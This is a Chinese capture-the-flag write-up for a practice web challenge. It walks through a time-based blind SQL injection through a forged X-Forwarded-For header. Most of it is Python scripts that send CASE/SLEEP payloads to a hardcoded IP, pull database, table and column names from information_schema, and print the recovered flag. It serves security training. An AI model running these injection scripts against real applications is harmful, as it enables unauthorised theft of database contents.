CTF练习平台——web15

1、web15

image

这道题的题目已经将源代码给我们了

可以看出这是time-based盲注

点开链接，我们看到

image

想到可以尝试各种IP的HTTP头：

    X-Forwarded-For

    Client-IP

    x-remote-IP

    x-originating-IP

    x-remote-addr

发现X-Forwarded-For可以伪造

image

发现注入的语句原封不动的显示在页面中，但如果注入的语句中有逗号，则逗号后面的内容就不会显示在页面中

image

逗号后面的内容被截掉了

然后就可以写一个脚本爆破得到库名，表名和字段名了

首先我们来找一下数据库名

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
database=[]

for database_number in range(0,100):        #假设爆破前100个库
    databasename=''
    for i in range(1,100):                  #爆破字符串长度，假设不超过100长度
        flag=0
        for str in guess:                   #爆破该位置的字符
            #print 'trying ',str
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                databasename+=str
                flag=1
                print('正在扫描第%d个数据库名，the databasename now is '%(database_number+1) ,databasename)
                break
        if flag==0:
            break
    database.append(databasename)
    if i==1 and flag==0:
        print('扫描完成')
        break

for i in range(len(database)):
    print(database[i])

找到的数据库为

TIM截图20180202145718.png

这里有两个数据库，我们先尝试information_schema这个数据库
用脚本跑一下有多少列

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
database=[]

for table_number in range(0,500):   
    print('trying',table_number)
    headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
    try:
        res=requests.get(url,headers=headers,timeout=4)
    except:
        print(table_number)
        break

TIM截图20180202154423.png

一共42列，一般猜测在最后，前面应该都是information_schema里的那些
尝试一下

# -*- coding:utf-8 -*-
import requests
import string
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
tables=[]
![TIM截图20180202153421.png](http://upload-images.jianshu.io/upload_images/9168776-0183444b8a11751c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

for table_number in range(41,42):           #假设从第60个开始
    tablename=''
    for i in range(1,100):                  #爆破字符串长度，假设不超过100长度
        flag=0
        for str in guess:                   #爆破该位置的字符
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                tablename+=str
                flag=1
                print('正在扫描第%d个数据库名，the tablename now is '%(table_number+1) ,tablename)
                break
        if flag==0:
            break
    tables.append(tablename)
    if i==1 and flag==0:
        print('扫描完成')
        break

for i in range(len(tables)):
    print(tables[i])

TIM截图20180202153421.png

找到了flag表

接下来求列名

再跑一下有多少列

# -*- coding:utf-8 -*-
import requests
import string
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
database=[]

for table_number in range(0,1000):
    print('trying',table_number)
    headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
    try:
        res=requests.get(url,headers=headers,timeout=4)
    except:
        print(table_number)
        break

TIM截图20180202155052.png

一共483列
老思路，直接暴力最后一个

# -*- coding:utf-8 -*-
import requests
import string
url = "http://120.24.86.145:8002/web15/"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
columns=[]

for column_number in range(482,483):            #假设从第60个开始
    cloumnname=''
    for i in range(1,100):                  #爆破字符串长度，假设不超过100长度
        flag=0
        for str in guess:                   #爆破该位置的字符
            #print 'trying',str
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                cloumnname+=str
                flag=1
                print('正在扫描第%d个列名，the cloumnname now is '%(column_number+1) ,cloumnname)
                break
        if flag==0:
            break
    columns.append(cloumnname)
    if i==1 and flag==0:
        print('扫描完成')
        break

for i in range(len(columns)):
    print(columns[i])

TIM截图20180202155419.png

然后直接暴力找flag就行了

import requests
import string
words = string.ascii_lowercase + string.ascii_uppercase + string.digits
url = 'http://120.24.86.145:8002/web15/'
answer=''
for length in range(1,100):
    flag=0
    for key in words:
        data = "'+(select case when (substring((select flag from flag) from {0} for 1)='{1}') then sleep() else 1 end) and '1'='1".format(length,str(key))
        headers={
            "X-FORWARDED-FOR": data
        }
        try:
            res=requests.get(url,headers=headers,timeout=5)
        except Exception as e:
            answer+=key
            print(answer)
            flag=1
            break
    if flag==0 and answer!= '':
        break;

print(answer)

flag{cdbf14c9551d5be5612f7bb5d2867853}